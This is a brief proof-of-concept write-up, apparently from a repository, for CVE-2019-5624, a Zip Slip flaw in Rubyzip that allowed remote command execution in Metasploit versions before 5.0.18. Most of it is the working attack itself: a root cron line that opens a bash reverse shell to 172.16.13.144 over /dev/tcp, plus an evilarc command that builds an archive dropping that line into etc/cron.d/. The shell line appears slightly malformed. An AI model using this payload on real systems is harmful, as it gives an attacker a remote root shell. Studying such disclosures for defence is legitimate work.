A proof of concept for Metasploit's CVE-2019-5624 vulnerability (Rubyzip insecure ZIP handling RCE)
In February 2019 I found a new vulnerability in the Rubyzip library. It allows an attacker to exploit insecure ZIP handling (Zip Slip) resulting in remote command execution.
This vulnerability was leveraged to targets all Metasploit versions < 5.0.18 Metasploit Wrap-Up
I've made this detailed blog post explaining the vulnerability.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/